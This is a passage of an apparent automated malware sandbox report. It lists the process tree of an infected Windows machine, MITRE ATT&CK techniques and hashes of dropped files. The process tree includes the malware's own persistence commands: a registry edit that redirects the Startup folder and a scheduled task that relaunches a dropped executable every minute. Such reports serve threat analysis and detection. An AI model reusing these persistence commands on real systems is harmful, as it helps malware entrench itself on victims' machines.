                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                      PID:8388
                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                      PID:8248
                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                      PID:9028
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                        PID:3936
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                      PID:4984
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                                      PID:8944
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                                      PID:7428
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                        PID:8220
                                                                                                                                                                                                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                        c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                        PID:8884
                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                                                          DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{630ef908-4758-724b-bd4f-8209b5bf2f71}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                          PID:7104
                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                                                          DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                          • Drops file in Drivers directory
                                                                                                                                                                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                          PID:9168
                                                                                                                                                                                                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                                        PID:6488
                                                                                                                                                                                                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                          PID:3520
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\F781.exe
                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\F781.exe
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                            PID:4476
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                                                            PID:9200
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                                                            PID:5964
                                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                                                                                            "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                            PID:7508
                                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                                                                                                                                                              MaskVPNUpdate.exe /silent
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                              PID:1372
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\9F3C.exe
                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\9F3C.exe
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                            PID:5180
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\B9CA.exe
                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\B9CA.exe
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                              PID:1124
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe"
                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                  PID:7968
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\bd1299733e\
                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                      PID:6360
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                        REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\bd1299733e\
                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                          PID:8548
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe" /F
                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                        PID:4980
                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\F7ED.exe
                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\F7ED.exe
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                    PID:9036
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                        PID:4980
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                                                      PID:9020
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                      C:\Windows\System32\svchost.exe -k wsappx -s ClipSVC
                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                      PID:1580
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                                                      PID:5068
                                                                                                                                                                                                                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                                                                                                                                      PID:9656
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                                                      PID:4992
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                                                      PID:8748
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                                                      PID:5568
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                                                      PID:5716
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                                                      PID:5992

                                                                                                                                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                                    Execution

                                                                                                                                                                                                                                                                                                                                    Scheduled Task

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1053

                                                                                                                                                                                                                                                                                                                                    Persistence

                                                                                                                                                                                                                                                                                                                                    Modify Existing Service

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1031

                                                                                                                                                                                                                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1060

                                                                                                                                                                                                                                                                                                                                    Scheduled Task

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1053

                                                                                                                                                                                                                                                                                                                                    Privilege Escalation

                                                                                                                                                                                                                                                                                                                                    Scheduled Task

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1053

                                                                                                                                                                                                                                                                                                                                    Defense Evasion

                                                                                                                                                                                                                                                                                                                                    Modify Registry

                                                                                                                                                                                                                                                                                                                                    4
                                                                                                                                                                                                                                                                                                                                    T1112

                                                                                                                                                                                                                                                                                                                                    Disabling Security Tools

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1089

                                                                                                                                                                                                                                                                                                                                    Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1497

                                                                                                                                                                                                                                                                                                                                    Install Root Certificate

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1130

                                                                                                                                                                                                                                                                                                                                    Credential Access

                                                                                                                                                                                                                                                                                                                                    Credentials in Files

                                                                                                                                                                                                                                                                                                                                    2
                                                                                                                                                                                                                                                                                                                                    T1081

                                                                                                                                                                                                                                                                                                                                    Discovery

                                                                                                                                                                                                                                                                                                                                    Software Discovery

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1518

                                                                                                                                                                                                                                                                                                                                    Query Registry

                                                                                                                                                                                                                                                                                                                                    7
                                                                                                                                                                                                                                                                                                                                    T1012

                                                                                                                                                                                                                                                                                                                                    Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1497

                                                                                                                                                                                                                                                                                                                                    System Information Discovery

                                                                                                                                                                                                                                                                                                                                    7
                                                                                                                                                                                                                                                                                                                                    T1082

                                                                                                                                                                                                                                                                                                                                    Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                                                    2
                                                                                                                                                                                                                                                                                                                                    T1120

                                                                                                                                                                                                                                                                                                                                    Remote System Discovery

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1018

                                                                                                                                                                                                                                                                                                                                    Collection

                                                                                                                                                                                                                                                                                                                                    Data from Local System

                                                                                                                                                                                                                                                                                                                                    2
                                                                                                                                                                                                                                                                                                                                    T1005

                                                                                                                                                                                                                                                                                                                                    Command and Control

                                                                                                                                                                                                                                                                                                                                    Web Service

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1102

                                                                                                                                                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      9499dac59e041d057327078ccada8329

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      707088977b09835d2407f91f4f6dbe4a4c8f2fff

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      ca607b3f03dd62f3ac9648087f30f502540be9944ef38b3ca622c2b9bcef06b9

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      9d78de87d752902587a77d410de012b626dabf5d3a8576f90a9f1056f7a9866a442132defb3b99f2a12346571bcec29dccad5c27cdd59222a51518ceab3fc397

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      9499dac59e041d057327078ccada8329

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      707088977b09835d2407f91f4f6dbe4a4c8f2fff

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      ca607b3f03dd62f3ac9648087f30f502540be9944ef38b3ca622c2b9bcef06b9

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      9d78de87d752902587a77d410de012b626dabf5d3a8576f90a9f1056f7a9866a442132defb3b99f2a12346571bcec29dccad5c27cdd59222a51518ceab3fc397

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      aed57d50123897b0012c35ef5dec4184

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      568571b12ca44a585df589dc810bf53adf5e8050

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      aed57d50123897b0012c35ef5dec4184

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      568571b12ca44a585df589dc810bf53adf5e8050

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      a3ec5ee946f7b93287ba9cf7facc6647

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      3595b700f8e41d45d8a8d15b42cd00cc19922647

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      5816801baeff9b520d4dfd930ccf147ae31a1742ff0c111c6becc87d402434f0

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      63efc7b19cd3301bdb4902d8ea59cae4e6c96475f6ea8215f9656a503ad763af0453e255a05dedce6dd1f6d17db964e9da1a243824676cf9611dc22974d687a6

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      a3ec5ee946f7b93287ba9cf7facc6647

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      3595b700f8e41d45d8a8d15b42cd00cc19922647

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      5816801baeff9b520d4dfd930ccf147ae31a1742ff0c111c6becc87d402434f0

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      63efc7b19cd3301bdb4902d8ea59cae4e6c96475f6ea8215f9656a503ad763af0453e255a05dedce6dd1f6d17db964e9da1a243824676cf9611dc22974d687a6

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      8690d4cc29a3c112ee7f6eb3981ac438

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      9e1613d8880a003ac49e52150853673afcd7c8be

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      68c926b002e8f4e0784481ea5b902f0a86991ef47787300c913c17821af510c9

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      4caafb3cc066b7bb366e849117f86b36e5bc5bef48ee66e7a2fbab83c3613fe119946f80524423ccc85434223fd1aefeab472005e0d1f462101ba080c43286f3

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      ddc4599754b9cc99309f4df8629ad6c5

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      9ffceead57341466bb043de29eb6987d89a9e4c1

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      e9303e923cf3c244d72af6427ac9bad1d31b994efd742af84cab8b55e675fcb4

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      69b8ed7d00a932ad886e7b3565568a82af77eeb7e0f27d3d785c8f9046f9bb77054d13eb7dfde74ce95346b4d9e277c8184e0983afdd32419db664b003b58423

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\LtKgYPO4JES4G2k1jF_7SvNF.exe.log
                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      41fbed686f5700fc29aaccf83e8ba7fd

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      5271bc29538f11e42a3b600c8dc727186e912456

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\UQYHUQbec84OHIEHKRshRFm2.exe.log
                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      41fbed686f5700fc29aaccf83e8ba7fd

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      5271bc29538f11e42a3b600c8dc727186e912456

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\gIttRCdDMdd27i0kH8sblMN9.exe.log
                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      41fbed686f5700fc29aaccf83e8ba7fd

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      5271bc29538f11e42a3b600c8dc727186e912456

